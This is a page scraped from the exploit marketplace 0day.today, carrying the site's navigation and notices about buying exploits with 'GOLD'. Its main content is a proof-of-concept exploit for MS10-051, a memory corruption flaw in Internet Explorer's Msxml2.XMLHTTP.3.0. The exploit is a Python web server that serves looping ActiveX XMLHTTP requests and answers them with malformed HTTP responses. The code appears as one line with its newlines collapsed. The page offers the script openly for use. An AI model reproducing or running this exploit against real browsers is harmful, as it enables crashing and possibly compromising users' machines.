0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)
================================================================= Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051) ================================================================= # Sources: # http://skypher.com/index.php/2010/08/10/ms10-051/ # http://code.google.com/p/skylined/issues/detail?id=17 # import os, re, socket; webserver_port = 28876; replies = { r'^/$': ('text/html', """ <SCRIPT> iCounter = 0 function go() { var request_url = location.protocol + "//" + location.host + "/RandomHTTP?counter=" + (iCounter++); var xml_http_request = new ActiveXObject("Msxml2.XMLHTTP.3.0"); xml_http_request.open("GET", request_url, false); xml_http_request.send(); setTimeout(go, 1); } go(); </SCRIPT> """), r'^/RandomHTTP\?counter=\d+$': 'HTTP 4\n', }; server_socket = socket.socket(); server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1); server_socket.bind(('', webserver_port)); server_socket.listen(1); print 'Webserver running at http://localhost:%d/' % webserver_port; while 1: client_socket,_ = server_socket.accept(); try: request = client_socket.recv(1024); except socket.error, e: print '>> ??'; continue; print '>> ' + request.split('\r\n')[0]; path = None; if request[:4] == 'GET ': end_path = request.find(' ', 4); if end_path != -1: path = request[4:end_path]; code, reason, mime_type, body = 404, 'Not found', 'text/plain', 'Not found'; response = None; if path is not None: for path_regexp in replies.keys(): if re.match(path_regexp, path): if type(replies[path_regexp]) == str: response = replies[path_regexp]; elif type(replies[path_regexp]) == tuple: code, reason = 200, 'OK'; mime_type, body = replies[path_regexp]; else: code, reason, mime_type, body = replies[path_regexp](path); break; if response is None: response = '\r\n'.join([ 'HTTP/1.1 %03d %s' % (code, reason), 'Content-Type: %s' % mime_type, 'Date: Sat Aug 28 1976 09:15:00 GMT', 'Expires: Sat Aug 28 1976 09:15:00 GMT', 'Cache-Control: no-cache, must-revalidate', 'Pragma: no-cache', 'Accept-Ranges: bytes', 'Content-Length: %d' % len(body), '', body ]); print '<< %s (%d bytes %s)' % \ (response.split('\r\n')[0], len(response), mime_type); try: client_socket.send(response); except socket.error, e: pass; client_socket.close(); # 0day.today [2024-07-02] #